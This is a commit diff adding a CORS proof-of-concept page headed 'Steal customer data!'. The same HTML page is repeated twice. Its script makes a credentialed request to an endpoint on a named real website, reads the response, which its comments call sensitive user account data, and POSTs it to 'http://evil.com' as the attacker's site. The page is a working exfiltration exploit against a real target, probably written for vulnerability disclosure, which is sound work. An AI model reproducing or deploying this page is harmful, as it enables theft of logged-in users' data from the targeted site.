andripwn · August 6, 2022 04:36
diff --git a/poccors.html b/poccors.html
 <!DOCTYPE html>
 <html>
 <body>
 <center>
 <h3>Steal customer data!</h3>
 <html>
 <body>
 <button type='button' onclick='cors()'>Exploit</button>
 <p id='demo'></p>
 <script>
 function cors() {
 var xhttp = new XMLHttpRequest();
 xhttp.onreadystatechange = function() {
 if (this.readyState == 4 && this.status == 200) {
 var a = this.responseText; // Sensitive data from hdn.nl about user account
 document.getElementById("demo").innerHTML = a;
 xhttp.open("POST", "http://evil.com", true);// Sending that data to Attacker's website
 xhttp.withCredentials = true;
 console.log(a);
 xhttp.send("data="+a);
 }
 };
 xhttp.open("GET", "https://www.hdn.nl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hdn.nl%2Fkwartaaloverzicht-q3%2F", true);
 xhttp.withCredentials = true;
 xhttp.send();
 }
 </script>
 </body>
 </html>
	<!DOCTYPE html>
	<html>
	<body>
	<center>
	<h3>Steal customer data!</h3>
	<html>
	<body>
	<button type='button' onclick='cors()'>Exploit</button>
	<p id='demo'></p>
	<script>
	function cors() {
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	var a = this.responseText; // Sensitive data from hdn.nl about user account
	document.getElementById("demo").innerHTML = a;
	xhttp.open("POST", "http://evil.com", true);// Sending that data to Attacker's website
	xhttp.withCredentials = true;
	console.log(a);
	xhttp.send("data="+a);
	}
	};
	xhttp.open("GET", "https://www.hdn.nl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hdn.nl%2Fkwartaaloverzicht-q3%2F", true);
	xhttp.withCredentials = true;
	xhttp.send();
	}
	</script>
	</body>
	</html>